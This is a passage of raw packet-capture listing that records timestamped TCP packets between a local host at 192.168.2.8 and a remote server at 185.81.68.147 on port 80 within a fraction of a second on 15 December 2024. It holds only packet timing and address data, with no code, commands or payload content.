                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.451775074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.452528954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.452697992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.452740908 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.453452110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.453564882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.453608036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.454539061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.454621077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.454663038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.455274105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.455391884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.455434084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.456242085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.456404924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.456449986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.457119942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.457240105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.457282066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.458028078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.458149910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.458203077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.458959103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.459086895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.459141016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.459990978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.460145950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.460189104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.460927963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.461042881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.461088896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.462570906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.462687016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.462735891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.463876963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.464118004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.464164019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.465450048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.465760946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.465888977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.466664076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.466692924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.466737986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.467137098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.467219114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.467264891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.467847109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.467958927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.468008041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.468560934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.468699932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.468748093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.469105959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.469199896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.469242096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.469830036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.469908953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.469954014 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.470549107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.470630884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.470669985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.471167088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.471306086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.471347094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.472142935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.472256899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.472299099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.473053932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.473191977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.473234892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.473891973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.474076986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.474124908 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.474730015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.474814892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.474860907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.475497007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.475615978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.475652933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.476428032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.476531029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.476571083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.477385044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.477536917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.477583885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.478267908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.478415012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.478503942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.479198933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.479322910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.479363918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.480098009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.480231047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.480267048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.481019020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.481129885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.481174946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.482009888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.482115984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.482203007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.482886076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.482961893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.483002901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.483802080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.494056940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.494129896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.494162083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.494465113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.494504929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.494545937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.495364904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.495410919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.495471001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.496263981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.496304035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.496370077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.497200012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.497246027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.497376919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.498127937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.498172045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.498218060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.499064922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.499102116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.499152899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.500013113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.500050068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.500057936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.500861883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.500902891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.500926018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.501808882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.501853943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.501924038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.555798054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.637106895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.637177944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.637285948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.637482882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.637598038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.637687922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.638401985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.638500929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.638539076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.639322996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.639419079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.639457941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.640228987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.640369892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.640455008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.641153097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.641264915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.641308069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.642081022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.642165899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.642213106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.642973900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.643156052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.643235922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.643913984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.644000053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.644081116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.644867897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.644926071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.645004988 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.645787001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.645896912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.645976067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.646749973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.646802902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.646883965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.647567987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.647708893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.647788048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.648507118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.648606062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.648685932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.649435043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.649621010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.649701118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.650351048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.650463104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.650500059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.651326895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.651448011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.651484013 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.652318001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.652417898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.652502060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.653321981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.653405905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.653443098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.654113054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.654232979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.654267073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.654931068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.655045986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.655081034 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.655874968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.655903101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.655940056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.656770945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.656888962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.656969070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.657716990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.657831907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.657864094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.658647060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.658771038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.658807993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.659560919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.659667969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.659712076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.660528898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.660625935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.660706997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.661484003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.661588907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.661623955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.662307024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.662430048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.662467957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.663245916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.663430929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.663539886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.664148092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.664268017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.664344072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.665071011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.665180922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.665263891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.666044950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.666100979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.666188955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.666910887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.666944027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.667042971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.667835951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.667937040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.668015957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.668773890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.668854952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.668891907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.669677019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.669776917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.669814110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.670603037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.670694113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.670732975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.671516895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.671627045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.671665907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.672796011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.672851086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.672897100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.673451900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.673561096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.673654079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.674308062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.674407959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.674498081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.675198078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.675355911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.675441027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.676084042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.686455965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.686492920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.686521053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.686733007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.686788082 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.686851025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.687736034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.687792063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.687830925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.688564062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.688625097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.688683987 CET8049709185.81.68.147192.168.2.8
